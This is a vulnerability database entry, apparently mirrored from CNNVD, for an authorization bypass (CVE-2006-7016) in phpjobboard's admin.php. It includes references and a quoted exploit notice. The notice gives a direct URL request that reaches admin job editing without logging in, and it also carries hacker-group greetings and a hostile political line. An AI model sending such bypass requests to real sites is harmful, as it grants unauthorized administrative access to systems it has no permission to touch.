phpjobboard 'admin.php' Privilege Escalation Vulnerability

Vulnerability ID 1191691 Vulnerability type Unknown
Published 2007-02-14 Updated 2007-02-14
CVE ID CVE-2006-7016 CNNVD-ID CNNVD-200702-287
Platform N/A CVSS score 7.5
|Vulnerability source
https://www.securityfocus.com/bid/87041
https://cxsecurity.com/issue/WLB-2007020056
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-287
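|Vulnerability details
phpjobboard allows remote attackers to bypass authorization and gain administrator privileges via a direct request to admin.php with adminop=job-edit.
|Vulnerability EXP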
SOFTWARE

==========

phpjobboard

DESCRIPTION:

============

job board administration bypass, and edit or add to new job.

example

http://[target]/phpjobboard or your path/admin.php?menu=job&adminop=job-edit&id=[item id]

============================================

greets iskorpitx(best),thehacker,metlak,shadow,tugra and all AYYILDIZ member.

#####damn with pkk terrorism, damn with terrorist people!

==========================================
|Affected products
Phpjobboard Phpjobboard 0
|References

Source: XF
Name: phpjobboard-admin-auth-bypass(26807)
Link: http://xforce.iss.net/xforce/xfdb/26807
Source: BUGTRAQ
Name: 20060525phpjobboardAuthecnicaladminbyPass
Link: http://www.securityfocus.com/archive/1/archive/1/435119/30/4710/threaded
Source: OSVDB
Name: 26561
Link: http://www.osvdb.org/26561
Source: VIM
Name: 20060617phpjobboardAuthecnicaladminbyPass(fwd)
Link: http://attrition.org/pipermail/vim/2006-June/000873.html
Source: SREASON
Name: 2253
Link: http://securityreason.com/securityalert/2253